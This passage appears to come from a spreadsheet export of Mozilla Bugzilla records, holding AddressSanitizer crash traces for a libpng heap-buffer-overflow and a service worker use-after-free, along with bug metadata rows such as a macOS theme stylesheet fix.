    #16 0x7f5a6084090c in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/glue/MessagePump.cpp:354:20
    #17 0x7f5a607b3d28 in RunInternal /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #18 0x7f5a607b3d28 in RunHandler /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #19 0x7f5a607b3d28 in MessageLoop::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #20 0x7f5a5fa6fea1 in nsThread::ThreadFunc(void*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:463:5
Crash Annotation GraphicsCriticalError: |[0][GFX1]: Unknown image format 16 (t=3.91881) |[6616][GFX1]: Unknown image format 16 (t=291.104) |[6617][GFX1]: Unknown image format 16 (t=291.171) |[6618][GFX1]: Unknown image format 16 (t=291.204) |[6604][GFX1]: Unknown image format 16 (t=290.738) |[6605][GFX1]: Unknown image format 16 (t=290.771) |[6606][GFX1]: Unknown image format 16 (t=290.805) |[6607][GFX1]: Unknown image format 16 (t=290.854) |[6608][GFX1]: Unknown image format 16 (t=290.871) |[6609][GFX1]: Unknown image format 16 (t=290.904) |[6610][GFX1]: Unknown image format 16 (t=290.937) |[6611][GFX1]: Unknown image format 16 (t=290.954) |[6612][GFX1]: Unknown image format 16 (t=290.988) |[6613][GFX1]: Unknown image format 16 (t=291.021) |[6614][GFX1]: Unknown image format 16 (t=291.037) |[6615][GFX1]: Unknown image format 16 (t=291.071) [GFX1]: Unknown image format 16
    #21 0x7f5a76ba3378 in _pt_root /builds/slave/m-in-l64-asan-0000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:216:5
    #22 0x7f5a7a115181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
0x610000321503 is located 10 bytes to the right of 185-byte region [0x610000321440,0x6100003214f9)
allocated by thread T32 (ImgDecoder #1) here:
    #0 0x4b247b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x7f5a687f1452 in MOZ_PNG_malloc_base /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/libpng/pngmem.c:95:17
    #2 0x7f5a687f1452 in MOZ_PNG_malloc /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/libpng/pngmem.c:179
    #3 0x7f5a687f1452 in MOZ_PNG_read_start_row /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/libpng/pngrutil.c:4673
    #4 0x7f5a687f0e87 in MOZ_PNG_read_update_info /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/libpng/pngread.c:350:10
    #5 0x7f5a622b1aa3 in mozilla::image::nsPNGDecoder::info_callback(png_struct_def*, png_info_def*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsPNGDecoder.cpp:648:3
    #6 0x7f5a687dd51f in MOZ_PNG_push_have_info /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/libpng/pngpread.c:1189:7
    #7 0x7f5a687dd51f in MOZ_PNG_push_read_chunk /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/libpng/pngpread.c:351
    #8 0x7f5a687db12b in MOZ_PNG_proc_some_data /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/libpng/pngpread.c:109:10
    #9 0x7f5a687db12b in MOZ_PNG_process_data /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/libpng/pngpread.c:46
    #10 0x7f5a622b7e69 in mozilla::image::nsPNGDecoder::ReadPNGData(char const*, unsigned long) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsPNGDecoder.cpp:379:3
    #11 0x7f5a622b588f in operator() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsPNGDecoder.cpp:362:16
    #12 0x7f5a622b588f in Lex&lt;(lambda at /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsPNGDecoder.cpp:359:21)&gt; /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/StreamingLexer.h:382
    #13 0x7f5a622b588f in mozilla::image::nsPNGDecoder::DoDecode(mozilla::image::SourceBufferIterator&amp;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsPNGDecoder.cpp:358
    #14 0x7f5a6221d4ca in mozilla::image::Decoder::Decode(mozilla::NotNull&lt;mozilla::image::IResumable*&gt;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/Decoder.cpp:155:44
    #15 0x7f5a6222f996 in mozilla::image::DecodingTask::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/IDecodingTask.cpp:88:17
    #16 0x7f5a6223d332 in mozilla::image::DecodePoolWorker::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/DecodePool.cpp:187:11
    #17 0x7f5a5fa74b86 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:1068:7
    #18 0x7f5a5faf2f6c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #19 0x7f5a6084090c in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/glue/MessagePump.cpp:354:20
    #20 0x7f5a607b3d28 in RunInternal /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #21 0x7f5a607b3d28 in RunHandler /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #22 0x7f5a607b3d28 in MessageLoop::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #23 0x7f5a5fa6fea1 in nsThread::ThreadFunc(void*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:463:5
    #24 0x7f5a76ba3378 in _pt_root /builds/slave/m-in-l64-asan-0000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:216:5
    #25 0x7f5a7a115181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
Thread T32 (ImgDecoder #1) created by T0 here:
Crash Annotation GraphicsCriticalError: |[0][GFX1]: Unknown image format 16 (t=3.91881) |[6616][GFX1]: Unknown image format 16 (t=291.104) |[6617][GFX1]: Unknown image format 16 (t=291.171) |[6618][GFX1]: Unknown image format 16 (t=291.204) |[6619][GFX1]: Unknown image format 16 (t=291.255) |[6605][GFX1]: Unknown image format 16 (t=290.771) |[6606][GFX1]: Unknown image format 16 (t=290.805) |[6607][GFX1]: Unknown image format 16 (t=290.854) |[6608][GFX1]: Unknown image format 16 (t=290.871) |[6609][GFX1]: Unknown image format 16 (t=290.904) |[6610][GFX1]: Unknown image format 16 (t=290.937) |[6611][GFX1]: Unknown image format 16 (t=290.954) |[6612][GFX1]: Unknown image format 16 (t=290.988) |[6613][GFX1]: Unknown image format 16 (t=291.021) |[6614][GFX1]: Unknown image format 16 (t=291.037) |[6615][GFX1]: Unknown image format 16 (t=291.071) [GFX1]: Unknown image format 16
    #0 0x49a839 in __interceptor_pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:238:3
    #1 0x7f5a76b9ff3f in _PR_CreateThread /builds/slave/m-in-l64-asan-0000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:457:14
    #2 0x7f5a76b9fb4a in PR_CreateThread /builds/slave/m-in-l64-asan-0000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:548:12
    #3 0x7f5a5fa7162b in nsThread::Init() /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:634:8
    #4 0x7f5a5fa78d4f in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThreadManager.cpp:253:17
    #5 0x7f5a5faf1f5e in NS_NewThread(nsIThread**, nsIRunnable*, unsigned int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:64:5
    #6 0x7f5a6221ad98 in mozilla::image::DecodePool::DecodePool() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/DecodePool.cpp:263:19
    #7 0x7f5a6221a310 in Singleton /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/DecodePool.cpp:220:22
    #8 0x7f5a6221a310 in mozilla::image::DecodePool::Initialize() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/DecodePool.cpp:212
    #9 0x7f5a62273ce5 in mozilla::image::EnsureModuleInitialized() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/build/nsImageModule.cpp:103:3
    #10 0x7f5a621d5b01 in imgLoader::CreateImageLoader() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/imgLoader.cpp:1147:3
    #11 0x7f5a621d5dd8 in imgLoader::NormalLoader() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/imgLoader.cpp:1159:21
    #12 0x7f5a6236dc76 in GetImgLoaderForDocument /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/base/nsContentUtils.cpp:3136:22
    #13 0x7f5a6236dc76 in nsContentUtils::LoadImage(nsIURI*, nsINode*, nsIDocument*, nsIPrincipal*, nsIURI*, mozilla::net::ReferrerPolicy, imgINotificationObserver*, int, nsAString_internal const&amp;, imgRequestProxy**, unsigned int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/base/nsContentUtils.cpp:3188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06][GFX1]: Unknown image format 16 (t=290.805) |[6607][GFX1]: Unknown image format 16 (t=290.854) |[6608][GFX1]: Unknown image format 16 (t=290.871) |[6609][GFX1]: Unknown image format 16 (t=290.904) |[6610][GFX1]: Unknown image format 16 (t=290.937) |[6611][GFX1]: Unknown image format 16 (t=290.954) |[6612][GFX1]: Unknown image format 16 (t=290.988) |[6613][GFX1]: Unknown image format 16 (t=291.021) |[6614][GFX1]: Unknown image format 16 (t=291.037) |[6615][GFX1]: Unknown image format 16 (t=291.071) [GFX1]: Unknown image format 16
    #14 0x7f5a665abe33 in mozilla::css::ImageLoader::LoadImage(nsIURI*, nsIPrincipal*, nsIURI*, mozilla::css::ImageValue*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/style/ImageLoader.cpp:262:17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21][GFX1]: Unknown image format 16 (t=291.338) |[6607][GFX1]: Unknown image format 16 (t=290.854) |[6608][GFX1]: Unknown image format 16 (t=290.871) |[6609][GFX1]: Unknown image format 16 (t=290.904) |[6610][GFX1]: Unknown image format 16 (t=290.937) |[6611][GFX1]: Unknown image format 16 (t=290.954) |[6612][GFX1]: Unknown image format 16 (t=290.988) |[6613][GFX1]: Unknown image format 16 (t=291.021) |[6614][GFX1]: Unknown image format 16 (t=291.037) |[6615][GFX1]: Unknown image format 16 (t=291.071) [GFX1]: Unknown image format 16
    #15 0x7f5a66669696 in mozilla::css::ImageValue::ImageValue(nsIURI*, nsStringBuffer*, nsIURI*, nsIPrincipal*, nsIDocument*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/style/nsCSSValue.cpp:2655:3
    #16 0x7f5a66663365 in nsCSSValue::StartImageLoad(nsIDocument*) const /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/style/nsCSSValue.cpp:746:9
    #17 0x7f5a666c1ea9 in TryToStartImageLoadOnValue(nsCSSValue const&amp;, nsIDocument*, nsStyleContext*, nsCSSProperty, bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/style/nsCSSDataBlock.cpp:83:5
    #18 0x7f5a666c1d23 in TryToStartImageLoad(nsCSSValue const&amp;, nsIDocument*, nsStyleContext*, nsCSSProperty, bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/style/nsCSSDataBlock.cpp:118:7
    #19 0x7f5a66619e0d in MapSinglePropertyInto(nsCSSProperty, nsCSSValue const*, nsCSSValue*, nsRuleData*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/style/nsCSSDataBlock.cpp:171:5
    #20 0x7f5a66618f70 in nsCSSCompressedDataBlock::MapRuleInfoInto(nsRuleData*) const /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/style/nsCSSDataBlock.cpp:318:9
    #21 0x7f5a6657cb3c in mozilla::css::Declaration::MapRuleInfoInto(nsRuleData*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/style/Declaration.cpp:98:3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21][GFX1]: Unknown image format 16 (t=291.338) |[6622][GFX1]: Unknown image format 16 (t=291.371) |[6608][GFX1]: Unknown image format 16 (t=290.871) |[6609][GFX1]: Unknown image format 16 (t=290.904) |[6610][GFX1]: Unknown image format 16 (t=290.937) |[6611][GFX1]: Unknown image format 16 (t=290.954) |[6612][GFX1]: Unknown image format 16 (t=290.988) |[6613][GFX1]: Unknown image format 16 (t=291.021) |[6614][GFX1]: Unknown image format 16 (t=291.037) |[6615][GFX1]: Unknown image format 16 (t=291.071) [GFX1]: Unknown image format 16
    #22 0x7f5a6677817b in nsRuleNode::WalkRuleTree(nsStyleStructID, nsStyleContext*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/style/nsRuleNode.cpp:2354:7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21][GFX1]: Unknown image format 16 (t=291.338) |[6622][GFX1]: Unknown image format 16 (t=291.371) |[6623][GFX1]: Unknown image format 16 (t=291.404) |[6609][GFX1]: Unknown image format 16 (t=290.904) |[6610][GFX1]: Unknown image format 16 (t=290.937) |[6611][GFX1]: Unknown image format 16 (t=290.954) |[6612][GFX1]: Unknown image format 16 (t=290.988) |[6613][GFX1]: Unknown image format 16 (t=291.021) |[6614][GFX1]: Unknown image format 16 (t=291.037) |[6615][GFX1]: Unknown image format 16 (t=291.071) [GFX1]: Unknown image format 16
    #23 0x7f5a669a4b41 in GetStyleBackground&lt;true&gt; /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/nsStyleStructList.h:81:1
    #24 0x7f5a669a4b41 in DoGetStyleBackground&lt;true&gt; /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/nsStyleStructList.h:81
    #25 0x7f5a669a4b41 in StyleBackground /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/nsStyleStructList.h:81
    #26 0x7f5a669a4b41 in StartBackgroundImageLoads /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/style/nsStyleContext.h:429
    #27 0x7f5a669a4b41 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:6082
    #28 0x7f5a66992112 in ConstructFramesFromItemList /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:10520:5
    #29 0x7f5a66992112 in nsCSSFrameConstructor::CreateAnonymousFrames(nsFrameConstructorState&amp;, nsIContent*, nsContainerFrame*, PendingBinding*, nsFrameItems&amp;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:4150
    #30 0x7f5a6698e7f4 in nsCSSFrameConstructor::BeginBuildingScrollFrame(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, nsIAtom*, bool, nsContainerFrame*&amp;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:4564:3
    #31 0x7f5a6698b4b5 in nsCSSFrameConstructor::SetUpDocElementContainingBlock(nsIContent*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:2891:25
    #32 0x7f5a669870ca in nsCSSFrameConstructor::ConstructDocElementFrame(mozilla::dom::Element*, nsILayoutHistoryState*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:2411:3
    #33 0x7f5a669aaf97 in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:7653:7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21][GFX1]: Unknown image format 16 (t=291.338) |[6622][GFX1]: Unknown image format 16 (t=291.371) |[6623][GFX1]: Unknown image format 16 (t=291.404) |[6624][GFX1]: Unknown image format 16 (t=291.421) |[6610][GFX1]: Unknown image format 16 (t=290.937) |[6611][GFX1]: Unknown image format 16 (t=290.954) |[6612][GFX1]: Unknown image format 16 (t=290.988) |[6613][GFX1]: Unknown image format 16 (t=291.021) |[6614][GFX1]: Unknown image format 16 (t=291.037) |[6615][GFX1]: Unknown image format 16 (t=291.071) [GFX1]: Unknown image format 16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21][GFX1]: Unknown image format 16 (t=291.338) |[6622][GFX1]: Unknown image format 16 (t=291.371) |[6623][GFX1]: Unknown image format 16 (t=291.404) |[6624][GFX1]: Unknown image format 16 (t=291.421) |[6625][GFX1]: Unknown image format 16 (t=291.438) |[6611][GFX1]: Unknown image format 16 (t=290.954) |[6612][GFX1]: Unknown image format 16 (t=290.988) |[6613][GFX1]: Unknown image format 16 (t=291.021) |[6614][GFX1]: Unknown image format 16 (t=291.037) |[6615][GFX1]: Unknown image format 16 (t=291.071) [GFX1]: Unknown image format 16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21][GFX1]: Unknown image format 16 (t=291.338) |[6622][GFX1]: Unknown image format 16 (t=291.371) |[6623][GFX1]: Unknown image format 16 (t=291.404) |[6624][GFX1]: Unknown image format 16 (t=291.421) |[6625][GFX1]: Unknown image format 16 (t=291.438) |[6626][GFX1]: Unknown image format 16 (t=291.455) |[6612][GFX1]: Unknown image format 16 (t=290.988) |[6613][GFX1]: Unknown image format 16 (t=291.021) |[6614][GFX1]: Unknown image format 16 (t=291.037) |[6615][GFX1]: Unknown image format 16 (t=291.071) [GFX1]: Unknown image format 16
    #34 0x7f5a66b489d7 in PresShell::Initialize(int, int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/base/nsPresShell.cpp:1726:7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21][GFX1]: Unknown image format 16 (t=291.338) |[6622][GFX1]: Unknown image format 16 (t=291.371) |[6623][GFX1]: Unknown image format 16 (t=291.404) |[6624][GFX1]: Unknown image format 16 (t=291.421) |[6625][GFX1]: Unknown image format 16 (t=291.438) |[6626][GFX1]: Unknown image format 16 (t=291.455) |[6627][GFX1]: Unknown image format 16 (t=291.488) |[6613][GFX1]: Unknown image format 16 (t=291.021) |[6614][GFX1]: Unknown image format 16 (t=291.037) |[6615][GFX1]: Unknown image format 16 (t=291.071) [GFX1]: Unknown image format 16
    #35 0x7f5a6268fbc1 in nsContentSink::StartLayout(bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/base/nsContentSink.cpp:1210:19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21][GFX1]: Unknown image format 16 (t=291.338) |[6622][GFX1]: Unknown image format 16 (t=291.371) |[6623][GFX1]: Unknown image format 16 (t=291.404) |[6624][GFX1]: Unknown image format 16 (t=291.421) |[6625][GFX1]: Unknown image format 16 (t=291.438) |[6626][GFX1]: Unknown image format 16 (t=291.455) |[6627][GFX1]: Unknown image format 16 (t=291.488) |[6628][GFX1]: Unknown image format 16 (t=291.522) |[6614][GFX1]: Unknown image format 16 (t=291.037) |[6615][GFX1]: Unknown image format 16 (t=291.071) [GFX1]: Unknown image format 16
    #36 0x7f5a61a2a426 in nsHtml5TreeOpExecutor::StartLayout() /builds/slave/m-in-l64-asan-0000000000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:612:3
    #37 0x7f5a61a36b7e in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) /builds/slave/m-in-l64-asan-0000000000000000/build/src/parser/html/nsHtml5TreeOperation.cpp:990:7
    #38 0x7f5a61a27d77 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/slave/m-in-l64-asan-0000000000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:448:21
    #39 0x7f5a61a2c80b in nsHtml5ExecutorFlusher::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/parser/html/nsHtml5StreamParser.cpp:128:9
    #40 0x7f5a5fa74b86 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:1068:7
    #41 0x7f5a5faf2f6c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #42 0x7f5a6083f4ef in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/glue/MessagePump.cpp:100:21
    #43 0x7f5a607b3d28 in RunInternal /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #44 0x7f5a607b3d28 in RunHandler /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #45 0x7f5a607b3d28 in MessageLoop::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #46 0x7f5a662060af in nsBaseAppShell::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/widget/nsBaseAppShell.cpp:156:3
    #47 0x7f5a6813ea91 in nsAppStartup::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/toolkit/components/startup/nsAppStartup.cpp:284:19
Crash Annotation GraphicsCriticalError: |[0][GFX1]: Unknown image format 16 (t=3.91881) |[6616][GFX1]: Unknown image format 16 (t=291.104) |[6617][GFX1]: Unknown image format 16 (t=291.171) |[6618][GFX1]: Unknown image format 16 (t=291.204) |[6619][GFX1]: Unknown image format 16 (t=291.255) |[6620][GFX1]: Unknown image format 16 (t=291.288) |[6621][GFX1]: Unknown image format 16 (t=291.338) |[6622][GFX1]: Unknown image format 16 (t=291.371) |[6623][GFX1]: Unknown image format 16 (t=291.404) |[6624][GFX1]: Unknown image format 16 (t=291.421) |[6625][GFX1]: Unknown image format 16 (t=291.438) |[6626][GFX1]: Unknown image format 16 (t=291.455) |[6627][GFX1]: Unknown image format 16 (t=291.488) |[6628][GFX1]: Unknown image format 16 (t=291.522) |[6629][GFX1]: Unknown image format 16 (t=291.554) |[6615][GFX1]: Unknown image format 16 (t=291.071) [GFX1]: Unknown image format 16
    #48 0x7f5a6828bbd3 in XREMain::XRE_mainRun() /builds/slave/m-in-l64-asan-0000000000000000/build/src/toolkit/xre/nsAppRunner.cpp:4213:10
    #49 0x7f5a6828d173 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/toolkit/xre/nsAppRunner.cpp:4332:8
    #50 0x7f5a6828e04a in XRE_main /builds/slave/m-in-l64-asan-0000000000000000/build/src/toolkit/xre/nsAppRunner.cpp:4423:16
    #51 0x4dfb47 in do_main /builds/slave/m-in-l64-asan-0000000000000000/build/src/browser/app/nsBrowserApp.cpp:251:10
    #52 0x4dfb47 in main /builds/slave/m-in-l64-asan-0000000000000000/build/src/browser/app/nsBrowserApp.cpp:387
    #53 0x7f5a7913dec4 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/slave/m-in-l64-asan-0000000000000000/build/src/media/libpng/pngrutil.c:4017:31 in MOZ_PNG_read_filt_row_a
Shadow bytes around the buggy address:
  0x0c208005c250: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c208005c260: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c208005c270: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c208005c280: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c208005c290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01
=&gt;0x0c208005c2a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c208005c2b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c208005c2c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c208005c2d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c208005c2e0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c208005c2f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd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t>
        </is>
      </c>
      <c r="X1637" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1638">
      <c r="A1638" t="n">
        <v>1412430</v>
      </c>
      <c r="B1638" t="inlineStr">
        <is>
          <t>2017-10-27 14:42:09 -0700</t>
        </is>
      </c>
      <c r="C1638" t="inlineStr">
        <is>
          <t>Move light theme tabstrip vibrancy rule to MacOS-specific stylesheet</t>
        </is>
      </c>
      <c r="D1638" t="inlineStr">
        <is>
          <t>2017-11-07 07:51:51 -0800</t>
        </is>
      </c>
      <c r="E1638" t="n">
        <v>1</v>
      </c>
      <c r="F1638" t="n">
        <v>1</v>
      </c>
      <c r="G1638" t="n">
        <v>2</v>
      </c>
      <c r="H1638" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1638" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1638" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K1638" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1638" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1638" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1638" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1638" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1638" t="inlineStr">
        <is>
          <t>[reserve-photon-visual]</t>
        </is>
      </c>
      <c r="Q1638" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1638" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1638" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T1638" t="n">
        <v>1</v>
      </c>
      <c r="U1638" t="n">
        <v>0</v>
      </c>
      <c r="V1638" t="n">
        <v>12</v>
      </c>
      <c r="W1638" t="inlineStr">
        <is>
          <t>I am a klutz and added the rule to compacttheme.inc.css in bug 1386721.</t>
        </is>
      </c>
      <c r="X1638" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1639">
      <c r="A1639" t="n">
        <v>1252330</v>
      </c>
      <c r="B1639" t="inlineStr">
        <is>
          <t>2016-02-29 18:00:32 -0800</t>
        </is>
      </c>
      <c r="C1639" t="inlineStr">
        <is>
          <t>Service Worker - Use After Free in BeginReading()</t>
        </is>
      </c>
      <c r="D1639" t="inlineStr">
        <is>
          <t>2024-05-30 09:09:55 -0700</t>
        </is>
      </c>
      <c r="E1639" t="n">
        <v>1</v>
      </c>
      <c r="F1639" t="n">
        <v>1</v>
      </c>
      <c r="G1639" t="n">
        <v>3</v>
      </c>
      <c r="H1639" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1639" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1639" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K1639" t="inlineStr">
        <is>
          <t>47 Branch</t>
        </is>
      </c>
      <c r="L1639" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1639" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1639" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1639" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1639" t="inlineStr">
        <is>
          <t>btpp-fixnow, [fixed in bug 1256411][post-critsmash-triage][adv-main46+]</t>
        </is>
      </c>
      <c r="Q1639" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1639" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1639" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1639" t="n">
        <v>1</v>
      </c>
      <c r="U1639" t="n">
        <v>0</v>
      </c>
      <c r="V1639" t="n">
        <v>22</v>
      </c>
      <c r="W1639" t="inlineStr">
        <is>
          <t>Firefox version: 47.0a1 (2016-02-28)
=================================================================
==5198==ERROR: AddressSanitizer: heap-use-after-free on address 0x60b00080aea8 at pc 0x7f0b32eb6c30 bp 0x7fff95e16fc0 sp 0x7fff95e16fb8
READ of size 8 at 0x60b00080aea8 thread T0
    #0 0x7f0b32eb6c2f in BeginReading /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsTSubstring.h:104
    #1 0x7f0b32eb6c2f in HashString /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsHashKeys.h:41
    #2 0x7f0b32eb6c2f in HashKey /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsHashKeys.h:185
